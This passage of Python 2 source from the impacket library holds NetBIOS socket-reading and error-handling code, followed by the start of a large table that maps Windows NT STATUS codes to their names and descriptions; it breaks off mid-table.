raise NetBIOSError, ( 'Error occurs while reading from remote', ERRCLASS_OS, ex[0] ) return data def non_polling_read(self, read_length, timeout): data = '' bytes_left = read_length while bytes_left > 0: try: ready, _, _ = select.select([self._sock.fileno() ], [ ], [ ], timeout) if not ready: raise NetBIOSTimeout received = self._sock.recv(bytes_left) if len(received) == 0: raise NetBIOSError, ( 'Error while reading from remote', ERRCLASS_OS, None) data = data + received bytes_left = read_length - len(data) except select.error, ex: if ex[0] != errno.EINTR and ex[0] != errno.EAGAIN: raise NetBIOSError, ( 'Error occurs while reading from remote', ERRCLASS_OS, ex[0] ) return data def __read(self, timeout = None): data = self.read_function(4, timeout) type, flags, length = unpack('>ccH', data) if ord(type) == NETBIOS_SESSION_MESSAGE: length = ord(flags) << 16 | length else: if ord(flags) & 0x01: length = length | 0x10000 data2 = self.read_function(length, timeout) return data + data2 ERRCLASS_QUERY = 0x00 ERRCLASS_SESSION = 0xf0 ERRCLASS_OS = 0xff QUERY_ERRORS = { 0x01: 'Request format error. Please file a bug report.', 0x02: 'Internal server error', 0x03: 'Name does not exist', 0x04: 'Unsupported request', 0x05: 'Request refused' } SESSION_ERRORS = { 0x80: 'Not listening on called name', 0x81: 'Not listening for calling name', 0x82: 'Called name not present', 0x83: 'Sufficient resources', 0x8f: 'Unspecified error' } def main(): print if __name__ == '__main__': main() impacket-0.9.10/impacket/nt_errors.py0000600000076500000240000136730112141750575017650 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies) # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: nt_errors.py 655 2012-08-14 23:21:48Z bethus@gmail.com $ # # Author: Alberto Solino (beto@coresecurity.com) # # Description: # NT STATUS Errors from [MS-ERREF]. Ideally all the files # should grab the error codes from here (big ToDo) # ERROR_MESSAGES = { 0x00000000: ("STATUS_SUCCESS","The operation completed successfully."), 0x00000001: ("STATUS_WAIT_1","The caller specified WaitAny for WaitType and one of the dispatcher objects in the Object array has been set to the signaled state."), 0x00000002: ("STATUS_WAIT_2","The caller specified WaitAny for WaitType and one of the dispatcher objects in the Object array has been set to the signaled state."), 0x00000003: ("STATUS_WAIT_3","The caller specified WaitAny for WaitType and one of the dispatcher objects in the Object array has been set to the signaled state."), 0x0000003F: ("STATUS_WAIT_63","The caller specified WaitAny for WaitType and one of the dispatcher objects in the Object array has been set to the signaled state."), 0x00000080: ("STATUS_ABANDONED","The caller attempted to wait for a mutex that has been abandoned."), 0x00000080: ("STATUS_ABANDONED_WAIT_0","The caller attempted to wait for a mutex that has been abandoned."), 0x000000BF: ("STATUS_ABANDONED_WAIT_63","The caller attempted to wait for a mutex that has been abandoned."), 0x000000C0: ("STATUS_USER_APC","A user-mode APC was delivered before the given Interval expired."), 0x00000101: ("STATUS_ALERTED","The delay completed because the thread was alerted."), 0x00000102: ("STATUS_TIMEOUT","The given Timeout interval expired."), 0x00000103: ("STATUS_PENDING","The operation that was requested is pending completion."), 0x00000104: ("STATUS_REPARSE","A reparse should be performed by the Object Manager because the name of the file resulted in a symbolic link."), 0x00000105: ("STATUS_MORE_ENTRIES","Returned by enumeration APIs to indicate more information is available to successive calls."), 0x00000106: ("STATUS_NOT_ALL_ASSIGNED","Indicates not all privileges or groups that are referenced are assigned to the caller. This allows, for example, all privileges to be disabled without having to know exactly which privileges are assigned."), 0x00000107: ("STATUS_SOME_NOT_MAPPED","Some of the information to be translated has not been translated."), 0x00000108: ("STATUS_OPLOCK_BREAK_IN_PROGRESS","An open/create operation completed while an opportunistic lock (oplock) break is underway."), 0x00000109: ("STATUS_VOLUME_MOUNTED","A new volume has been mounted by a file system."), 0x0000010A: ("STATUS_RXACT_COMMITTED","This success level status indicates that the transaction state already exists for the registry subtree but that a transaction commit was previously aborted. The commit has now been completed."), 0x0000010B: ("STATUS_NOTIFY_CLEANUP","Indicates that a notify change request has been completed due to closing the handle that made the notify change request."), 0x0000010C: ("STATUS_NOTIFY_ENUM_DIR","Indicates that a notify change request is being completed and that the information is not being returned in the caller's buffer. The caller now needs to enumerate the files to find the changes."), 0x0000010D: ("STATUS_NO_QUOTAS_FOR_ACCOUNT","{No Quotas} No system quota limits are specifically set for this account."), 0x0000010E: ("STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED","{Connect Failure on Primary Transport} An attempt was made to connect to the remote server %hs on the primary transport, but the connection failed. The computer WAS able to connect on a secondary transport."), 0x00000110: ("STATUS_PAGE_FAULT_TRANSITION","The page fault was a transition fault."), 0x00000111: ("STATUS_PAGE_FAULT_DEMAND_ZERO","The page fault was a demand zero fault."), 0x00000112: ("STATUS_PAGE_FAULT_COPY_ON_WRITE","The page fault was a demand zero fault."), 0x00000113: ("STATUS_PAGE_FAULT_GUARD_PAGE","The page fault was a demand zero fault."), 0x00000114: ("STATUS_PAGE_FAULT_PAGING_FILE","The page fault was satisfied by reading from a secondary storage device."), 0x00000115: ("STATUS_CACHE_PAGE_LOCKED","The cached page was locked during operation."), 0x00000116: ("STATUS_CRASH_DUMP","The crash dump exists in a paging file."), 0x00000117: ("STATUS_BUFFER_ALL_ZEROS","The specified buffer contains all zeros."), 0x00000118: ("STATUS_REPARSE_OBJECT","A reparse should be performed by the Object Manager because the name of the file resulted in a symbolic link."), 0x00000119: ("STATUS_RESOURCE_REQUIREMENTS_CHANGED","The device has succeeded a query-stop and its resource requirements have changed."), 0x00000120: ("STATUS_TRANSLATION_COMPLETE","The translator has translated these resources into the global space and no additional translations should be performed."), 0x00000121: ("STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY","The directory service evaluated group memberships locally, because it was unable to contact a global catalog server."), 0x00000122: ("STATUS_NOTHING_TO_TERMINATE","A process being terminated has no threads to terminate."), 0x00000123: ("STATUS_PROCESS_NOT_IN_JOB","The specified process is not part of a job."), 0x00000124: ("STATUS_PROCESS_IN_JOB","The specified process is part of a job."), 0x00000125: ("STATUS_VOLSNAP_HIBERNATE_READY","{Volume Shadow Copy Service} The system is now ready for hibernation."), 0x00000126: ("STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY","A file system or file system filter driver has successfully completed an FsFilter operation."), 0x00000127: ("STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED","The specified interrupt vector was already connected."), 0x00000128: ("STATUS_INTERRUPT_STILL_CONNECTED","The specified interrupt vector is still connected."), 0x00000129: ("STATUS_PROCESS_CLONED","The current process is a cloned process."), 0x0000012A: ("STATUS_FILE_LOCKED_WITH_ONLY_READERS","The file was locked and all users of the file can only read."), 0x0000012B: ("STATUS_FILE_LOCKED_WITH_WRITERS","The file was locked and at least one user of the file can write."), 0x00000202: ("STATUS_RESOURCEMANAGER_READ_ONLY","The specified ResourceManager made no changes or updates to the resource under this transaction."), 0x00000367: ("STATUS_WAIT_FOR_OPLOCK","An operation is blocked and waiting for an oplock."), 0x00010001: ("DBG_EXCEPTION_HANDLED","Debugger handled the exception."), 0x00010002: ("DBG_CONTINUE","The debugger continued."), 0x001C0001: ("STATUS_FLT_IO_COMPLETE","The IO was completed by a filter."), 0xC0000467: ("STATUS_FILE_NOT_AVAILABLE","The file is temporarily unavailable."), 0xC0000721: ("STATUS_CALLBACK_RETURNED_THREAD_AFFINITY","A threadpool worker thread entered a callback at thread affinity %p and exited at affinity %p. This is unexpected, indicating that the callback missed restoring the priority."), 0x40000000: ("STATUS_OBJECT_NAME_EXISTS","{Object Exists} An attempt was made to create an object but the object name already exists."), 0x40000001: ("STATUS_THREAD_WAS_SUSPENDED","{Thread Suspended} A thread termination occurred while the thread was suspended. The thread resumed, and termination proceeded."), 0x40000002: ("STATUS_WORKING_SET_LIMIT_RANGE","{Working Set Range Error} An attempt was made to set the working set minimum or maximum to values that are outside the allowable range."), 0x40000003: ("STATUS_IMAGE_NOT_AT_BASE","{Image Relocated} An image file could not be mapped at the address that is specified in the image file. Local fixes must be performed on this image."), 0x40000004: ("STATUS_RXACT_STATE_CREATED","This informational level status indicates that a specified registry subtree transaction state did not yet exist and had to be created."), 0x40000005: ("STATUS_SEGMENT_NOTIFICATION","{Segment Load} A virtual DOS machine (VDM) is loading, unloading, or moving an MS-DOS or Win16 program segment image. An exception is raised so that a debugger can load, unload, or track symbols and breakpoints within these 16-bit segments."), 0x40000006: ("STATUS_LOCAL_USER_SESSION_KEY","{Local Session Key} A user session key was requested for a local remote procedure call (RPC) connection. The session key that is returned is a constant value and not unique to this connection."), 0x40000007: ("STATUS_BAD_CURRENT_DIRECTORY","{Invalid Current Directory} The process cannot switch to the startup current directory %hs. Select OK to set the current directory to %hs, or select CANCEL to exit."), 0x40000008: ("STATUS_SERIAL_MORE_WRITES","{Serial IOCTL Complete} A serial I/O operation was completed by another write to a serial port. (The IOCTL_SERIAL_XOFF_COUNTER reached zero.)"), 0x40000009: ("STATUS_REGISTRY_RECOVERED","{Registry Recovery} One of the files that contains the system registry data had to be recovered by using a log or alternate copy. The recovery was successful."), 0x4000000A: ("STATUS_FT_READ_RECOVERY_FROM_BACKUP","{Redundant Read} To satisfy a read request, the Windows NT fault-tolerant file system successfully read the requested data from a redundant copy. This was done because the file system encountered a failure on a member of the fault-tolerant volume but was unable to reassign the failing area of the device."), 0x4000000B: ("STATUS_FT_WRITE_RECOVERY","{Redundant Write} To satisfy a write request, the Windows NT fault-tolerant file system successfully wrote a redundant copy of the information. This was done because the file system encountered a failure on a member of the fault-tolerant volume but was unable to reassign the failing area of the device."), 0x4000000C: ("STATUS_SERIAL_COUNTER_TIMEOUT","{Serial IOCTL Timeout} A serial I/O operation completed because the time-out period expired. (The IOCTL_SERIAL_XOFF_COUNTER had not reached zero.)"), 0x4000000D: ("STATUS_NULL_LM_PASSWORD","{Password Too Complex} The Windows password is too complex to be converted to a LAN Manager password. The LAN Manager password that returned is a NULL string."), 0x4000000E: ("STATUS_IMAGE_MACHINE_TYPE_MISMATCH","{Machine Type Mismatch} The image file %hs is valid but is for a machine type other than the current machine. Select OK to continue, or CANCEL to fail the DLL load."), 0x4000000F: ("STATUS_RECEIVE_PARTIAL","{Partial Data Received} The network transport returned partial data to its client. The remaining data will be sent later."), 0x40000010: ("STATUS_RECEIVE_EXPEDITED","{Expedited Data Received} The network transport returned data to its client that was marked as expedited by the remote system."), 0x40000011: ("STATUS_RECEIVE_PARTIAL_EXPEDITED","{Partial Expedited Data Received} The network transport returned partial data to its client and this data was marked as expedited by the remote system. The remaining data will be sent later."), 0x40000012: ("STATUS_EVENT_DONE","{TDI Event Done} The TDI indication has completed successfully."), 0x40000013: ("STATUS_EVENT_PENDING","{TDI Event Pending} The TDI indication has entered the pending state."), 0x40000014: ("STATUS_CHECKING_FILE_SYSTEM","Checking file system on %wZ."), 0x40000015: ("STATUS_FATAL_APP_EXIT","{Fatal Application Exit} %hs"), 0x40000016: ("STATUS_PREDEFINED_HANDLE","The specified registry key is referenced by a predefined handle."), 0x40000017: ("STATUS_WAS_UNLOCKED","{Page Unlocked} The page protection of a locked page was changed to 'No Access' and the page was unlocked from memory and from the process."), 0x40000018: ("STATUS_SERVICE_NOTIFICATION","%hs"), 0x40000019: ("STATUS_WAS_LOCKED","{Page Locked} One of the pages to lock was already locked."), 0x4000001A: ("STATUS_LOG_HARD_ERROR","Application popup: %1 : %2"), 0x4000001B: ("STATUS_ALREADY_WIN32","A Win32 process already exists."), 0x4000001C: ("STATUS_WX86_UNSIMULATE","An exception status code that is used by the Win32 x86 emulation subsystem."), 0x4000001D: ("STATUS_WX86_CONTINUE","An exception status code that is used by the Win32 x86 emulation subsystem."), 0x4000001E: ("STATUS_WX86_SINGLE_STEP","An exception status code that is used by the Win32 x86 emulation subsystem."), 0x4000001F: ("STATUS_WX86_BREAKPOINT","An exception status code that is used by the Win32 x86 emulation subsystem."), 0x40000020: ("STATUS_WX86_EXCEPTION_CONTINUE","An exception status code that is used by the Win32 x86 emulation subsystem."), 0x40000021: ("STATUS_WX86_EXCEPTION_LASTCHANCE","An exception status code that is used by the Win32 x86 emulation subsystem."), 0x40000022: ("STATUS_WX86_EXCEPTION_CHAIN","An exception status code that is used by the Win32 x86 emulation subsystem."), 0x40000023: ("STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE","{Machine Type Mismatch} The image file %hs is valid but is for a machine type other than the current machine."), 0x40000024: ("STATUS_NO_YIELD_PERFORMED","A yield execution was performed and no thread was available to run."), 0x40000025: ("STATUS_TIMER_RESUME_IGNORED","The resume flag to a timer API was ignored."), 0x40000026: ("STATUS_ARBITRATION_UNHANDLED","The arbiter has deferred arbitration of these resources to its parent."), 0x40000027: ("STATUS_CARDBUS_NOT_SUPPORTED","The device has detected a CardBus card in its slot."), 0x40000028: ("STATUS_WX86_CREATEWX86TIB","An exception status code that is used by the Win32 x86 emulation subsystem."), 0x40000029: ("STATUS_MP_PROCESSOR_MISMATCH","The CPUs in this multiprocessor system are not all the same revision level. To use all processors, the operating system restricts itself to the features of the least capable processor in the system. If problems occur with this system, contact the CPU manufacturer to see if this mix of processors is supported."), 0x4000002A: ("STATUS_HIBERNATED","The system was put into hibernation."), 0x4000002B: ("STATUS_RESUME_HIBERNATION","The system was resumed from hibernation."), 0x4000002C: ("STATUS_FIRMWARE_UPDATED","Windows has detected that the system firmware (BIOS) was updated [previous firmware date = %2, current firmware date %3]."), 0x4000002D: ("STATUS_DRIVERS_LEAKING_LOCKED_PAGES","A device driver is leaking locked I/O pages and is causing system degradation. The system has automatically enabled the tracking code to try and catch the culprit."), 0x4000002E: ("STATUS_MESSAGE_RETRIEVED","The ALPC message being canceled has already been retrieved from the queue on the other side."), 0x4000002F: ("STATUS_SYSTEM_POWERSTATE_TRANSITION","The system power state is transitioning from %2 to %3."), 0x40000030: ("STATUS_ALPC_CHECK_COMPLETION_LIST","The receive operation was successful. Check the ALPC completion list for the received message."), 0x40000031: ("STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION","The system power state is transitioning from %2 to %3 but could enter %4."), 0x40000032: ("STATUS_ACCESS_AUDIT_BY_POLICY","Access to %1 is monitored by policy rule %2."), 0x40000033: ("STATUS_ABANDON_HIBERFILE","A valid hibernation file has been invalidated and should be abandoned."), 0x40000034: ("STATUS_BIZRULES_NOT_ENABLED","Business rule scripts are disabled for the calling application."), 0x40000294: ("STATUS_WAKE_SYSTEM","The system has awoken."), 0x40000370: ("STATUS_DS_SHUTTING_DOWN","The directory service is shutting down."), 0x40010001: ("DBG_REPLY_LATER","Debugger will reply later."), 0x40010002: ("DBG_UNABLE_TO_PROVIDE_HANDLE","Debugger cannot provide a handle."), 0x40010003: ("DBG_TERMINATE_THREAD","Debugger terminated the thread."), 0x40010004: ("DBG_TERMINATE_PROCESS","Debugger terminated the process."), 0x40010005: ("DBG_CONTROL_C","Debugger obtained control of C."), 0x40010006: ("DBG_PRINTEXCEPTION_C","Debugger printed an exception on control C."), 0x40010007: ("DBG_RIPEXCEPTION","Debugger received a RIP exception."), 0x40010008: ("DBG_CONTROL_BREAK","Debugger received a control break."), 0x40010009: ("DBG_COMMAND_EXCEPTION","Debugger command communication exception."), 0x40020056: ("RPC_NT_UUID_LOCAL_ONLY","A UUID that is valid only on this computer has been allocated."), 0x400200AF: ("RPC_NT_SEND_INCOMPLETE","Some data remains to be sent in the request buffer."), 0x400A0004: ("STATUS_CTX_CDM_CONNECT","The Client Drive Mapping Service has connected on Terminal Connection."), 0x400A0005: ("STATUS_CTX_CDM_DISCONNECT","The Client Drive Mapping Service has disconnected on Terminal Connection."), 0x4015000D: ("STATUS_SXS_RELEASE_ACTIVATION_CONTEXT","A kernel mode component is releasing a reference on an activation context."), 0x40190034: ("STATUS_RECOVERY_NOT_NEEDED","The transactional resource manager is already consistent. Recovery is not needed."), 0x40190035: ("STATUS_RM_ALREADY_STARTED","The transactional resource manager has already been started."), 0x401A000C: ("STATUS_LOG_NO_RESTART","The log service encountered a log stream with no restart area."), 0x401B00EC: ("STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST","{Display Driver Recovered From Failure} The %hs display driver has detected a failure and recovered from it. Some graphical operations may have failed. The next time you restart the machine, a dialog box appears, giving you an opportunity to upload data about this failure to Microsoft."), 0x401E000A: ("STATUS_GRAPHICS_PARTIAL_DATA_POPULATED","The specified buffer is not big enough to contain the entire requested dataset. Partial data is populated up to the size of the buffer. The caller needs to provide a buffer of the size as specified in the partially populated buffer's content (interface specific)."), 0x401E0117: ("STATUS_GRAPHICS_DRIVER_MISMATCH","The kernel driver detected a version mismatch between it and the user mode driver."), 0x401E0307: ("STATUS_GRAPHICS_MODE_NOT_PINNED","No mode is pinned on the specified VidPN source/target."), 0x401E031E: ("STATUS_GRAPHICS_NO_PREFERRED_MODE","The specified mode set does not specify a preference for one of its modes."), 0x401E034B: ("STATUS_GRAPHICS_DATASET_IS_EMPTY","The specified dataset (for example, mode set, frequency range set, descriptor set, or topology) is empty."), 0x401E034C: ("STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET","The specified dataset (for example, mode set, frequency range set, descriptor set, or topology) does not contain any more elements."), 0x401E0351: ("STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED","The specified content transformation is not pinned on the specified VidPN present path."), 0x401E042F: ("STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS","The child device presence was not reliably detected."), 0x401E0437: ("STATUS_GRAPHICS_LEADLINK_START_DEFERRED","Starting the lead adapter in a linked configuration has been temporarily deferred."), 0x401E0439: ("STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY","The display adapter is being polled for children too frequently at the same polling level."), 0x401E043A: ("STATUS_GRAPHICS_START_DEFERRED","Starting the adapter has been temporarily deferred."), 0x40230001: ("STATUS_NDIS_INDICATION_REQUIRED","The request will be completed later by an NDIS status indication."), 0x80000001: ("STATUS_GUARD_PAGE_VIOLATION","{EXCEPTION} Guard Page Exception A page of memory that marks the end of a data structure, such as a stack or an array, has been accessed."), 0x80000002: ("STATUS_DATATYPE_MISALIGNMENT","{EXCEPTION} Alignment Fault A data type misalignment was detected in a load or store instruction."), 0x80000003: ("STATUS_BREAKPOINT","{EXCEPTION} Breakpoint A breakpoint has been reached."), 0x80000004: ("STATUS_SINGLE_STEP","{EXCEPTION} Single Step A single step or trace operation has just been completed."), 0x80000005: ("STATUS_BUFFER_OVERFLOW","{Buffer Overflow} The data was too large to fit into the specified buffer."), 0x80000006: ("STATUS_NO_MORE_FILES","{No More Files} No more files were found which match the file specification."), 0x80000007: ("STATUS_WAKE_SYSTEM_DEBUGGER","{Kernel Debugger Awakened} The system debugger was awakened by an interrupt."), 0x8000000A: ("STATUS_HANDLES_CLOSED","{Handles Closed} Handles to objects have been automatically closed because of the requested operation."), 0x8000000B: ("STATUS_NO_INHERITANCE","{Non-Inheritable ACL} An access control list (ACL) contains no components that can be inherited."), 0x8000000C: ("STATUS_GUID_SUBSTITUTION_MADE","{GUID Substitution} During the translation of a globally unique identifier (GUID) to a Windows security ID (SID), no administratively defined GUID prefix was found. A substitute prefix was used, which will not compromise system security. However, this may provide a more restrictive access than intended."), 0x8000000D: ("STATUS_PARTIAL_COPY","Because of protection conflicts, not all the requested bytes could be copied."), 0x8000000E: ("STATUS_DEVICE_PAPER_EMPTY","{Out of Paper} The printer is out of paper."), 0x8000000F: ("STATUS_DEVICE_POWERED_OFF","{Device Power Is Off} The printer power has been turned off."), 0x80000010: ("STATUS_DEVICE_OFF_LINE","{Device Offline} The printer has been taken offline."), 0x80000011: ("STATUS_DEVICE_BUSY","{Device Busy} The device is currently busy."), 0x80000012: ("STATUS_NO_MORE_EAS","{No More EAs} No more extended attributes (EAs) were found for the file."), 0x80000013: ("STATUS_INVALID_EA_NAME","{Illegal EA} The specified extended attribute (EA) name contains at least one illegal character."), 0x80000014: ("STATUS_EA_LIST_INCONSISTENT","{Inconsistent EA List} The extended attribute (EA) list is inconsistent."), 0x80000015: ("STATUS_INVALID_EA_FLAG","{Invalid EA Flag} An invalid extended attribute (EA) flag was set."), 0x80000016: ("STATUS_VERIFY_REQUIRED","{Verifying Disk} The media has changed and a verify operation is in progress; therefore, no reads or writes may be performed to the device, except those that are used in the verify operation."), 0x80000017: ("STATUS_EXTRANEOUS_INFORMATION","{Too Much Information} The specified access control list (ACL) contained more information than was expected."), 0x80000018: ("STATUS_RXACT_COMMIT_NECESSARY","This warning level status indicates that the transaction state already exists for the registry subtree, but that a transaction commit was previously aborted. The commit has NOT been completed but has not been rolled back either; therefore, it may still be committed, if needed."), 0x8000001A: ("STATUS_NO_MORE_ENTRIES","{No More Entries} No more entries are available from an enumeration operation."), 0x8000001B: ("STATUS_FILEMARK_DETECTED","{Filemark Found} A filemark was detected."), 0x8000001C: ("STATUS_MEDIA_CHANGED","{Media Changed} The media may have changed."), 0x8000001D: ("STATUS_BUS_RESET","{I/O Bus Reset} An I/O bus reset was detected."), 0x8000001E: ("STATUS_END_OF_MEDIA","{End of Media} The end of the media was encountered."), 0x8000001F: ("STATUS_BEGINNING_OF_MEDIA","The beginning of a tape or partition has been detected."), 0x80000020: ("STATUS_MEDIA_CHECK","{Media Changed} The media may have changed."), 0x80000021: ("STATUS_SETMARK_DETECTED","A tape access reached a set mark."), 0x80000022: ("STATUS_NO_DATA_DETECTED","During a tape access, the end of the data written is reached."), 0x80000023: ("STATUS_REDIRECTOR_HAS_OPEN_HANDLES","The redirector is in use and cannot be unloaded."), 0x80000024: ("STATUS_SERVER_HAS_OPEN_HANDLES","The server is in use and cannot be unloaded."), 0x80000025: ("STATUS_ALREADY_DISCONNECTED","The specified connection has already been disconnected."), 0x80000026: ("STATUS_LONGJUMP","A long jump has been executed."), 0x80000027: ("STATUS_CLEANER_CARTRIDGE_INSTALLED","A cleaner cartridge is present in the tape library."), 0x80000028: ("STATUS_PLUGPLAY_QUERY_VETOED","The Plug and Play query operation was not successful."), 0x80000029: ("STATUS_UNWIND_CONSOLIDATE","A frame consolidation has been executed."), 0x8000002A: ("STATUS_REGISTRY_HIVE_RECOVERED","{Registry Hive Recovered} The registry hive (file): %hs was corrupted and it has been recovered. Some data might have been lost."), 0x8000002B: ("STATUS_DLL_MIGHT_BE_INSECURE","The application is attempting to run executable code from the module %hs. This may be insecure. An alternative, %hs, is available. Should the application use the secure module %hs?"), 0x8000002C: ("STATUS_DLL_MIGHT_BE_INCOMPATIBLE","The application is loading executable code from the module %hs. This is secure but may be incompatible with previous releases of the operating system. An alternative, %hs, is available. Should the application use the secure module %hs?"), 0x8000002D: ("STATUS_STOPPED_ON_SYMLINK","The create operation stopped after reaching a symbolic link."), 0x80000288: ("STATUS_DEVICE_REQUIRES_CLEANING","The device has indicated that cleaning is necessary."), 0x80000289: ("STATUS_DEVICE_DOOR_OPEN","The device has indicated that its door is open. Further operations require it closed and secured."), 0x80000803: ("STATUS_DATA_LOST_REPAIR","Windows discovered a corruption in the file %hs. This file has now been repaired. Check if any data in the file was lost because of the corruption."), 0x80010001: ("DBG_EXCEPTION_NOT_HANDLED","Debugger did not handle the exception."), 0x80130001: ("STATUS_CLUSTER_NODE_ALREADY_UP","The cluster node is already up."), 0x80130002: ("STATUS_CLUSTER_NODE_ALREADY_DOWN","The cluster node is already down."), 0x80130003: ("STATUS_CLUSTER_NETWORK_ALREADY_ONLINE","The cluster network is already online."), 0x80130004: ("STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE","The cluster network is already offline."), 0x80130005: ("STATUS_CLUSTER_NODE_ALREADY_MEMBER","The cluster node is already a member of the cluster."), 0x80190009: ("STATUS_COULD_NOT_RESIZE_LOG","The log could not be set to the requested size."), 0x80190029: ("STATUS_NO_TXF_METADATA","There is no transaction metadata on the file."), 0x80190031: ("STATUS_CANT_RECOVER_WITH_HANDLE_OPEN","The file cannot be recovered because there is a handle still open on it."), 0x80190041: ("STATUS_TXF_METADATA_ALREADY_PRESENT","Transaction metadata is already present on this file and cannot be superseded."), 0x80190042: ("STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET","A transaction scope could not be entered because the scope handler has not been initialized."), 0x801B00EB: ("STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED","{Display Driver Stopped Responding and recovered} The %hs display driver has stopped working normally. The recovery had been performed."), 0x801C0001: ("STATUS_FLT_BUFFER_TOO_SMALL","{Buffer too small} The buffer is too small to contain the entry. No information has been written to the buffer."), 0x80210001: ("STATUS_FVE_PARTIAL_METADATA","Volume metadata read or write is incomplete."), 0x80210002: ("STATUS_FVE_TRANSIENT_STATE","BitLocker encryption keys were ignored because the volume was in a transient state."), 0xC0000001: ("STATUS_UNSUCCESSFUL","{Operation Failed} The requested operation was unsuccessful."), 0xC0000002: ("STATUS_NOT_IMPLEMENTED","{Not Implemented} The requested operation is not implemented."), 0xC0000003: ("STATUS_INVALID_INFO_CLASS","{Invalid Parameter} The specified information class is not a valid information class for the specified object."), 0xC0000004: ("STATUS_INFO_LENGTH_MISMATCH","The specified information record length does not match the length that is required for the specified information class."), 0xC0000005: ("STATUS_ACCESS_VIOLATION","The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s."), 0xC0000006: ("STATUS_IN_PAGE_ERROR","The instruction at 0x%08lx referenced memory at 0x%08lx. The required data was not placed into memory because of an I/O error status of 0x%08lx."), 0xC0000007: ("STATUS_PAGEFILE_QUOTA","The page file quota for the process has been exhausted."), 0xC0000008: ("STATUS_INVALID_HANDLE","An invalid HANDLE was specified."), 0xC0000009: ("STATUS_BAD_INITIAL_STACK","An invalid initial stack was specified in a call to NtCreateThread."), 0xC000000A: ("STATUS_BAD_INITIAL_PC","An invalid initial start address was specified in a call to NtCreateThread."), 0xC000000B: ("STATUS_INVALID_CID","An invalid client ID was specified."), 0xC000000C: ("STATUS_TIMER_NOT_CANCELED","An attempt was made to cancel or set a timer that has an associated APC and the specified thread is not the thread that originally set the timer with an associated APC routine."), 0xC000000D: ("STATUS_INVALID_PARAMETER","An invalid parameter was passed to a service or function."), 0xC000000E: ("STATUS_NO_SUCH_DEVICE","A device that does not exist was specified."), 0xC000000F: ("STATUS_NO_SUCH_FILE","{File Not Found} The file %hs does not exist."), 0xC0000010: ("STATUS_INVALID_DEVICE_REQUEST","The specified request is not a valid operation for the target device."), 0xC0000011: ("STATUS_END_OF_FILE","The end-of-file marker has been reached. There is no valid data in the file beyond this marker."), 0xC0000012: ("STATUS_WRONG_VOLUME","{Wrong Volume} The wrong volume is in the drive. Insert volume %hs into drive %hs."), 0xC0000013: ("STATUS_NO_MEDIA_IN_DEVICE","{No Disk} There is no disk in the drive. Insert a disk into drive %hs."), 0xC0000014: ("STATUS_UNRECOGNIZED_MEDIA","{Unknown Disk Format} The disk in drive %hs is not formatted properly. Check the disk, and reformat it, if needed."), 0xC0000015: ("STATUS_NONEXISTENT_SECTOR","{Sector Not Found} The specified sector does not exist."), 0xC0000016: ("STATUS_MORE_PROCESSING_REQUIRED","{Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete."), 0xC0000017: ("STATUS_NO_MEMORY","{Not Enough Quota} Not enough virtual memory or paging file quota is available to complete the specified operation."), 0xC0000018: ("STATUS_CONFLICTING_ADDRESSES","{Conflicting Address Range} The specified address range conflicts with the address space."), 0xC0000019: ("STATUS_NOT_MAPPED_VIEW","The address range to unmap is not a mapped view."), 0xC000001A: ("STATUS_UNABLE_TO_FREE_VM","The virtual memory cannot be freed."), 0xC000001B: ("STATUS_UNABLE_TO_DELETE_SECTION","The specified section cannot be deleted."), 0xC000001C: ("STATUS_INVALID_SYSTEM_SERVICE","An invalid system service was specified in a system service call."), 0xC000001D: ("STATUS_ILLEGAL_INSTRUCTION","{EXCEPTION} Illegal Instruction An attempt was made to execute an illegal instruction."), 0xC000001E: ("STATUS_INVALID_LOCK_SEQUENCE","{Invalid Lock Sequence} An attempt was made to execute an invalid lock sequence."), 0xC000001F: ("STATUS_INVALID_VIEW_SIZE","{Invalid Mapping} An attempt was made to create a view for a section that is bigger than the section."), 0xC0000020: ("STATUS_INVALID_FILE_FOR_SECTION","{Bad File} The attributes of the specified mapping file for a section of memory cannot be read."), 0xC0000021: ("STATUS_ALREADY_COMMITTED","{Already Committed} The specified address range is already committed."), 0xC0000022: ("STATUS_ACCESS_DENIED","{Access Denied} A process has requested access to an object but has not been granted those access rights."), 0xC0000023: ("STATUS_BUFFER_TOO_SMALL","{Buffer Too Small} The buffer is too small to contain the entry. No information has been written to the buffer."), 0xC0000024: ("STATUS_OBJECT_TYPE_MISMATCH","{Wrong Type} There is a mismatch between the type of object that is required by the requested operation and the type of object that is specified in the request."), 0xC0000025: ("STATUS_NONCONTINUABLE_EXCEPTION","{EXCEPTION} Cannot Continue Windows cannot continue from this exception."), 0xC0000026: ("STATUS_INVALID_DISPOSITION","An invalid exception disposition was returned by an exception handler."), 0xC0000027: ("STATUS_UNWIND","Unwind exception code."), 0xC0000028: ("STATUS_BAD_STACK","An invalid or unaligned stack was encountered during an unwind operation."), 0xC0000029: ("STATUS_INVALID_UNWIND_TARGET","An invalid unwind target was encountered during an unwind operation."), 0xC000002A: ("STATUS_NOT_LOCKED","An attempt was made to unlock a page of memory that was not locked."), 0xC000002B: ("STATUS_PARITY_ERROR","A device parity error on an I/O operation."), 0xC000002C: ("STATUS_UNABLE_TO_DECOMMIT_VM","An attempt was made to decommit uncommitted virtual memory."), 0xC000002D: ("STATUS_NOT_COMMITTED","An attempt was made to change the attributes on memory that has not been committed."), 0xC000002E: ("STATUS_INVALID_PORT_ATTRIBUTES","Invalid object attributes specified to NtCreatePort or invalid port attributes specified to NtConnectPort."), 0xC000002F: ("STATUS_PORT_MESSAGE_TOO_LONG","The length of the message that was passed to NtRequestPort or NtRequestWaitReplyPort is longer than the maximum message that is allowed by the port."), 0xC0000030: 